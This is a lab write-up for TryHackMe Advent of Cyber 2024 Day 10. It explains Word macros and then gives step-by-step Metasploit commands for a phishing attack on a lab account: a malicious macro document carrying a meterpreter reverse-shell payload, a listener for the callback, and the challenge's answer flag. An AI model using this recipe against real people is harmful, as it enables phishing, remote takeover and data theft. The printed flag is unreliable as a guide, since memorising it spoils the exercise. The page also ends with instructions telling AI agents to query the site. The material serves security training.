# Day 10

## Intro to Macros <a href="#id-8d94" id="id-8d94"></a>

The needs of MS Office users can be vastly different, and there is no way that a default installation would cater to all of these needs. In particular, some users find themselves repeating the same tasks, such as formatting and inserting text or performing calculations. Consider the example of number-to-words conversion where a number such as "1337" needs to be expressed as "one thousand three hundred thirty-seven". It would take hours to finish if you have hundreds of numbers to convert. Hence, there is a need for an automated solution to save time and reduce manual effort.

In computing, a macro refers to a set of programmed instructions designed to automate repetitive tasks. MS Word, among other MS Office products, supports adding macros to documents. In many cases, these macros can be a tremendous time-saving feature. However, in cyber security, these automated programs can be hijacked for malicious purposes.

To add a macro to an MS Word document for instance, we click on the **View** menu and then select **Macros** as pointed out by 1 and 2 in the screenshot below. We should specify the name of the macro and specify that we want to save it in our current document, as indicated by 3 and 4. Finally, we press the **Create** button.

#### Task 16 — Phishing Day 10: He had a brain full of macros, and had shells in his soul. <a href="#f104" id="f104"></a>

**1. What is the flag value inside the `flag.txt` file that's located on the Administrator's desktop?**

Use the following steps to gain access.

I. Payload Creation II. Creating Listener III. Sending Payload and Exploiting

**I. Payload Creation**

1. Open a Terminal and type `msfconsole`
2. Now type the commands below one by one to create a word payload.

```bash
Copyset payload windows/meterpreter/reverse_tcp
use exploit/multi/fileformat/office_word_macro
set LHOST CONNECTION_IP                                   # Set Your Machnie IP IF connected with VPN or Attackbox VPN
set LPORT 8888
exploit
```

3\. Notice the Location and move the Word document to any other location.

**II. Creating Listener**

1. Now open another terminal and type the below commands to set the Listener

```bash
Copyuse exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST CONNECTION_IP  # The Same IP you set on the Payload
set LPORT 8888
exploit
```

2\. The Listener is Running, now we have to send the payload to the Victim.

**III. Sending Payload and Exploiting**

1. In your browser, paste your TryhackMe Machine IP into a new tab and log in with the credentials that were given to you.
2. Create a new mail and use `marta@socmas.thm` as the receiver.
3. Add a Dummy Subject and and add the Word document payload that we created.
4. Now wait till the victim clicks that.
5. Once you get the Reverse Connection, type the below command to read the flag.

`cat c:/users/Administrator/Desktop/flag.txt`

or

`cd c:/users/Administrator/Desktop` and type `cat flag.txt`

```css
CopyAns: THM{PHISHING_CHRISTMAS}
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://foothold.gitbook.io/blog/advent-of-cyber-2024/day-10.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.